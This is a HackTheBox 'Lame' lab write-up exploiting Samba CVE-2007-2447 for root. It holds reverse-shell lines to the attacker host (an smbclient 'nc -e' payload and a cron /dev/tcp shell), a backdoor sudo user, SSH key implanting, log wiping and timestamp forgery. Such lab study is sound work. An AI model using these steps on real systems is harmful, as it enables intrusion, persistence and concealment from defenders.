HackTheBox Lame

Writeup for HackTheBox Lame

Posted Mar 14, 2017 Updated Jul 30, 2025

By Edwin Tok

3 min read

HackTheBox Lame

Machine Synopsis

Key Exploitation Techniques:

Samba usermap script vulnerability (CVE-2007-2447)
Remote code execution to immediate root access
Alternative exploitation paths analysis

Reconnaissance & Enumeration

Port Discovery

  
$ nmap -p- --min-rate 10000 10.10.10.3
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Service Enumeration

  
$ nmap -p 21,22,139,445 -sC -sV 10.10.10.3
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

Vulnerability Research

  
$ searchsploit vsftpd 2.3.4
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/17491.rb

$ searchsploit samba 3.0.20
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution | unix/remote/16320.rb

Exploitation

Failed Attempt: vsftpd 2.3.4 Backdoor

  
$ msfconsole -q
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

Successful Exploitation: Samba CVE-2007-2447

Manual Exploitation

  
# Download the exploit
$ wget https://raw.githubusercontent.com/amriunix/CVE-2007-2447/master/usermap_script.py

# Setup netcat listener
$ nc -nlvp 1234

# Execute exploit
$ python usermap_script.py 10.10.10.3 445 10.10.14.3 1234
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !

Root Shell Access

  
$ nc -nlvp 1234
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.3] 34329
id
uid=0(root) gid=0(root)

cd /root
cat root.txt
1958f8c5ebfa347cc8dc6b7c35a3b132

cd /home/makis
cat user.txt 
a848bb4bcd8a9651138d9cfa73d4d16e

Post-Exploitation Techniques

Persistence Methods

SSH Key Installation

  
# Generate SSH key pair
$ ssh-keygen -t rsa -b 2048 -f lame_key

# Install public key on target
echo "ssh-rsa AAAAB3NzaC1yc2E..." >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chmod 700 /root/.ssh

# Test SSH access
$ ssh -i lame_key root@10.10.10.3

Backdoor User Account

  
# Create backdoor user with root privileges
useradd -m -s /bin/bash -G sudo backup
echo 'backup:password123' | chpasswd
echo "backup ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers

Cron Job Persistence

  
# Add persistent reverse shell cron job
echo "*/5 * * * * root /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/4444 0>&1'" >> /etc/crontab

# Verify cron job
crontab -l

Defense Evasion

Log Cleanup

  
# Clear system logs
echo > /var/log/auth.log
echo > /var/log/syslog
echo > /var/log/daemon.log

# Clear Samba logs
echo > /var/log/samba/log.smbd
echo > /var/log/samba/log.nmbd

# Clear bash history
history -c
echo > /root/.bash_history
unset HISTFILE

File Timestamp Manipulation

  
# Match timestamps to system files
touch -r /bin/bash /tmp/backdoor
touch -r /etc/passwd /root/.ssh/authorized_keys

Lateral Movement Preparation

Network Discovery

  
# Discover network hosts
nmap -sn 10.10.10.0/24

# Port scanning
nmap -sS -A 10.10.10.1-254

Credential Harvesting

  
# Search for stored credentials
grep -r "password" /etc/ 2>/dev/null | grep -v "Binary"
find /home -name "*.txt" -o -name "*.conf" -o -name "*.xml" | xargs grep -l "password" 2>/dev/null

# Check Samba configuration
cat /etc/samba/smb.conf | grep -E "(user|pass)"

Alternative Exploitation Methods

Metasploit Module

  
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.3
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.14.3:4444 
[*] Command shell session 1 opened
id
uid=0(root) gid=0(root)

Manual SMB Client Exploitation

  
# Connect using smbclient with malicious username
$ smbclient //10.10.10.3/tmp
smb: \> logon "/=`nohup nc -e /bin/sh 10.10.14.3 1337`"

HackTheBox

linux

This post is licensed under CC BY 4.0 by the author.

Machine Synopsis

Reconnaissance & Enumeration

Port Discovery

Service Enumeration

Vulnerability Research

Exploitation

Failed Attempt: vsftpd 2.3.4 Backdoor

Successful Exploitation: Samba CVE-2007-2447

Manual Exploitation

Root Shell Access

Post-Exploitation Techniques

Persistence Methods

SSH Key Installation

Backdoor User Account

Cron Job Persistence

Defense Evasion

Log Cleanup

File Timestamp Manipulation

Lateral Movement Preparation

Network Discovery

Credential Harvesting

Alternative Exploitation Methods

Metasploit Module

Manual SMB Client Exploitation

Trending Tags